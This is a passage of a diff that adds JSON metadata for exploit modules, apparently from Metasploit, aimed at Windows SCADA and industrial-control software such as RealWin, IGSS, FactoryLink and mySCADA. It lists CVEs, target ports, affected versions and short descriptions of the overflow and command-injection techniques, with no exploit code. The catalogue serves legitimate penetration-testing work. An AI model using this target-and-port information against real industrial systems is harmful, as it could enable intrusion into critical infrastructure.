The commands will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.tenable.com/security/research/tra-2024-13", + "CVE-2024-4548" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 928, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-08-19 22:47:19 +0000", + "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb", + "is_install_path": true, + "ref_name": "windows/scada/diaenergie_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/factorylink_csservice": { + "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow", + "fullname": "exploit/windows/scada/factorylink_csservice", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-25", + "type": "exploit", + "author": [ + "Luigi Auriemma ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found on Siemens FactoryLink 8. 
The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results arbitrary code execution.", + "references": [ + "OSVDB-72812", + "URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" + ], + "platform": "Windows", + "arch": "", + "rport": 7580, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP0" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/factorylink_csservice.rb", + "is_install_path": true, + "ref_name": "windows/scada/factorylink_csservice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/factorylink_vrn_09": { + "name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow", + "fullname": "exploit/windows/scada/factorylink_vrn_09", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "hal", + "MC " + ], + "description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. 
Originally found and posted by\n Luigi Auriemma.", + "references": [ + "OSVDB-72815", + "URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" + ], + "platform": "Windows", + "arch": "", + "rport": 7579, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "FactoryLink 7.5", + "FactoryLink 7.5 SP2", + "FactoryLink 8.0.1.703" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb", + "is_install_path": true, + "ref_name": "windows/scada/factorylink_vrn_09", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/ge_proficy_cimplicity_gefebt": { + "name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution", + "fullname": "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-01-23", + "type": "exploit", + "author": [ + "amisto0x07", + "Z0mb1E", + "juan vazquez " + ], + "description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. 
If\n the target does not have the WebClient service enabled, an external SMB service is necessary.", + "references": [ + "CVE-2014-0750", + "ZDI-14-015", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" + ], + "mod_time": "2017-09-13 22:03:34 +0000", + "path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb", + "is_install_path": true, + "ref_name": "windows/scada/ge_proficy_cimplicity_gefebt", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/iconics_genbroker": { + "name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01", + "fullname": "exploit/windows/scada/iconics_genbroker", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Lincoln", + "corelanc0d3r " + ], + "description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n the memory allocations needed for the number of elements passed by the client.\n This results unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. 
Also, DEP bypass is supported.", + "references": [ + "OSVDB-72817", + "URL-http://aluigi.org/adv/genesis_4-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" + ], + "platform": "Windows", + "arch": "", + "rport": 38080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/iconics_genbroker.rb", + "is_install_path": true, + "ref_name": "windows/scada/iconics_genbroker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/iconics_webhmi_setactivexguid": { + "name": "ICONICS WebHMI ActiveX Buffer Overflow", + "fullname": "exploit/windows/scada/iconics_webhmi_setactivexguid", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-05", + "type": "exploit", + "author": [ + "Scoot Bell ", + "Blair Strang ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2011-2089", + "OSVDB-72135", + "URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf", + "EDB-17240", + "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6/7/8 on Windows XP SP3", + "IE 7 on Windows Vista" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb", + "is_install_path": true, + "ref_name": 
"windows/scada/iconics_webhmi_setactivexguid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_igssdataserver_listall": { + "name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow", + "fullname": "exploit/windows/scada/igss9_igssdataserver_listall", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Lincoln", + "corelanc0d3r ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. 
Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.", + "references": [ + "CVE-2011-1567", + "OSVDB-72353", + "URL-http://aluigi.altervista.org/adv/igss_2-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_igssdataserver_listall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_igssdataserver_rename": { + "name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow", + "fullname": "exploit/windows/scada/igss9_igssdataserver_rename", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n which results arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. 
The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.", + "references": [ + "CVE-2011-1567", + "OSVDB-72352", + "URL-http://aluigi.altervista.org/adv/igss_5-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP2/R2 SP2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_igssdataserver_rename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss9_misc": { + "name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities", + "fullname": "exploit/windows/scada/igss9_misc", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-03-24", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "sinn3r " + ], + "description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. 
The initial approach is first by transferring our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.", + "references": [ + "CVE-2011-1565", + "CVE-2011-1566", + "OSVDB-72354", + "OSVDB-72349", + "URL-http://aluigi.altervista.org/adv/igss_1-adv.txt", + "URL-http://aluigi.altervista.org/adv/igss_8-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" + ], + "platform": "Windows", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP", + "Windows 7", + "Windows Server 2003 / R2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/igss9_misc.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss9_misc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/igss_exec_17": { + "name": "Interactive Graphical SCADA System Remote Command Injection", + "fullname": "exploit/windows/scada/igss_exec_17", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. 
In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.", + "references": [ + "CVE-2011-1566", + "OSVDB-72349", + "URL-http://aluigi.org/adv/igss_8-adv.txt" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 12397, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/igss_exec_17.rb", + "is_install_path": true, + "ref_name": "windows/scada/igss_exec_17", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/indusoft_webstudio_exec": { + "name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution", + "fullname": "exploit/windows/scada/indusoft_webstudio_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. 
It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.", + "references": [ + "CVE-2011-4051", + "OSVDB-77179", + "BID-50675", + "ZDI-11-330" + ], + "platform": "Windows", + "arch": "", + "rport": 4322, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP / 2003" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb", + "is_install_path": true, + "ref_name": "windows/scada/indusoft_webstudio_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/moxa_mdmtool": { + "name": "MOXA Device Manager Tool 2.1 Buffer Overflow", + "fullname": "exploit/windows/scada/moxa_mdmtool", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-20", + "type": "exploit", + "author": [ + "Ruben Santamarta", + "MC " + ], + "description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4741", + "OSVDB-69027", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-301-01A" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MOXA MDM Tool 2.1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/moxa_mdmtool.rb", + "is_install_path": true, + "ref_name": "windows/scada/moxa_mdmtool", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/mypro_cmdexe": { + "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)", + "fullname": 
"exploit/windows/scada/mypro_cmdexe", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-09-22", + "type": "exploit", + "author": [ + "Michael Heinzl" + ], + "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06", + "CVE-2023-28384" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-07-25 23:54:27 +0000", + "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb", + "is_install_path": true, + "ref_name": "windows/scada/mypro_cmdexe", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/mypro_mgr_cmd": { + "name": "mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)", + "fullname": "exploit/windows/scada/mypro_mgr_cmd", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-11-21", + "type": "exploit", + "author": [ + "Michael Heinzl" + ], + "description": "Unauthenticated Command Injection in MyPRO Manager <= v1.2 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of the myscada9 administrative user that is automatically added by the product.", + "references": [ + "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07", + "CVE-2024-47407" + ], + "platform": "Windows", + "arch": "cmd", + 
"rport": 34022, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2025-01-29 20:18:05 +0000", + "path": "/modules/exploits/windows/scada/mypro_mgr_cmd.rb", + "is_install_path": true, + "ref_name": "windows/scada/mypro_mgr_cmd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/procyon_core_server": { + "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", + "fullname": "exploit/windows/scada/procyon_core_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-08", + "type": "exploit", + "author": [ + "Knud Hojgaard ", + "mr_me " + ], + "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. 
Also, after the\n payload exits, Coreservice.exe should automatically recover.", + "references": [ + "CVE-2011-3322", + "OSVDB-75371", + "URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - No dep bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/procyon_core_server.rb", + "is_install_path": true, + "ref_name": "windows/scada/procyon_core_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin": { + "name": "DATAC RealWin SCADA Server Buffer Overflow", + "fullname": "exploit/windows/scada/realwin", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-09-26", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-4322", + "OSVDB-48606", + "BID-31418" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/realwin.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_on_fc_binfile_a": { + "name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_on_fc_binfile_a", + "aliases": [], + "rank": 500, 
+ "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)", + "references": [ + "CVE-2011-1563", + "OSVDB-72826", + "BID-46937", + "URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_on_fc_binfile_a", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_on_fcs_login": { + "name": "RealWin SCADA Server DATAC Login Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_on_fcs_login", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-03-21", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC ", + "B|H " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. 
By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2011-1563", + "OSVDB-72824", + "URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt", + "URL-http://www.dataconline.com/software/realwin.php", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" + ], + "platform": "Windows", + "arch": "", + "rport": 910, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_on_fcs_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_initialize": { + "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_initialize", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-15", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-68812", + "CVE-2010-4142", + "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" + ], + "platform": "Windows", + "arch": "", + "rport": 912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_initialize", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_initialize_rf": { + "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_initialize_rf", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-15", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-68812", + "CVE-2010-4142", + "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" + ], + "platform": "Windows", + "arch": "", + "rport": 912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_initialize_rf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/realwin_scpc_txtevent": { + "name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow", + "fullname": "exploit/windows/scada/realwin_scpc_txtevent", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-18", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4142", + "OSVDB-68812" + ], + "platform": "Windows", + "arch": "", + "rport": 
912, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb", + "is_install_path": true, + "ref_name": "windows/scada/realwin_scpc_txtevent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/rockwell_factorytalk_rce": { + "name": "Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/scada/rockwell_factorytalk_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-22", + "type": "exploit", + "author": [ + "Pedro Ribeiro ", + "Radek Domanski " + ], + "description": "This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n on the Rockwell FactoryTalk View SE SCADA product as the IIS user.\n The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,\n the second is a directory traversal, and the third is a race condition. 
In order to achieve full remote code execution on all\n targets, two information leak vulnerabilities are also abused.\n This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.", + "references": [ + "URL-https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md", + "URL-https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md", + "CVE-2020-12027", + "CVE-2020-12028", + "CVE-2020-12029", + "ZDI-20-727", + "ZDI-20-728", + "ZDI-20-729", + "ZDI-20-730" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Rockwell Automation FactoryTalk SE" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb", + "is_install_path": true, + "ref_name": "windows/scada/rockwell_factorytalk_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/scadapro_cmdexe": { + "name": "Measuresoft ScadaPro Remote Command Execution", + "fullname": "exploit/windows/scada/scadapro_cmdexe", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-09-16", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "mr_me ", + "TecR0c " + ], + "description": "This module allows remote attackers to execute arbitrary commands on the\n affected system by abusing via Directory Traversal attack when using the\n 'xf' command (execute function). 
An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.", + "references": [ + "CVE-2011-3497", + "OSVDB-75490", + "BID-49613", + "URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt", + "URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf", + "URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": 11234, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb", + "is_install_path": true, + "ref_name": "windows/scada/scadapro_cmdexe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/sunway_force_control_netdbsrv": { + "name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57", + "fullname": "exploit/windows/scada/sunway_force_control_netdbsrv", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-09-22", + "type": "exploit", 